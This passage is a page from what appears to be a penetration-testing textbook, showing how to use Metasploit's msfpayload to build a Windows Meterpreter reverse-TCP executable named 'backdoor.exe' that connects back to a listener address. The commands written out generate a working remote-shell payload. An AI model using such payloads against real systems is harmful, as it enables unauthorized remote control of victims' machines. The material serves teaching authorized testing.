Postexploitation
◾
245
Since our target is a Windows operating system, we can use any
of our Windows-based pay-
loads. For the sake of this demonstration we use
windows/meterpreter/reverse _ tcp
.
Let’s view its options.
Command
:
msfpayload windows/meterpreter/reverse_tcp O
The O parameter is used to list information about the module. As you can see we need
LHOST and the lport. The default is set to 4444; in case we don’t
define one it will automati-
cally set it to 4444. We will also use an additional parameter “X” to output the payload as an
executable.
Command
:
msfpayload windows/meterpreter/reverse_tcp lhost = 192.168.75.144 lport =
4444 X >/root/Desktop/backdoor.exe
The executable would be generated on the desktop with the name “backdoor.exe”.
Dostları ilə paylaş: